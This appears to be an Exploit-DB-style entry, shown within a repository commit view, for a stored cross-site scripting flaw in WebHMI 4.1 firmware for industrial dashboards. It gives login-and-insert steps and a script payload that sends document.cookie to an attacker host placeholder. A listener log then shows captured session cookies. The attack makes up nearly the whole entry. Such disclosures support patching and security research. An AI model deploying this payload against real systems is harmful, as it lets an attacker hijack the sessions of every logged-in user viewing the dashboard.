7755ac3af6
9 changes to exploits/shellcodes Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD Simple Real Estate Portal System 1.0 - 'id' SQLi Air Cargo Management System v1.0 - SQLi aaPanel 6.8.21 - Directory Traversal (Authenticated) Student Record System 1.0 - 'cid' SQLi (Authenticated) WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)
30 lines
No EOL
1 KiB
Text
30 lines
No EOL
1 KiB
Text
# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
|
|
# Date: 04/01/2022
|
|
# Exploit Author: Antonio Cuomo (arkantolo)
|
|
# Vendor Homepage: https://webhmi.com.ua/en/
|
|
# Version: WebHMI Firmware 4.1.1.7662
|
|
# Tested on: WebHMI Firmware 4.1.1.7662
|
|
|
|
#Steps to Reproduce
|
|
|
|
1. Login to admin account
|
|
|
|
2. Add a new register or create new dashboard
|
|
insert payload
|
|
|
|
<script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script>
|
|
|
|
in Title field and save.
|
|
|
|
# Dashboard section impact instantly all logged users.
|
|
|
|
#Listener log:
|
|
GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1
|
|
Host: 192.168.0.169:8080
|
|
Connection: keep-alive
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
|
|
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
|
|
Sec-GPC: 1
|
|
Referer: http://192.168.0.153/
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 |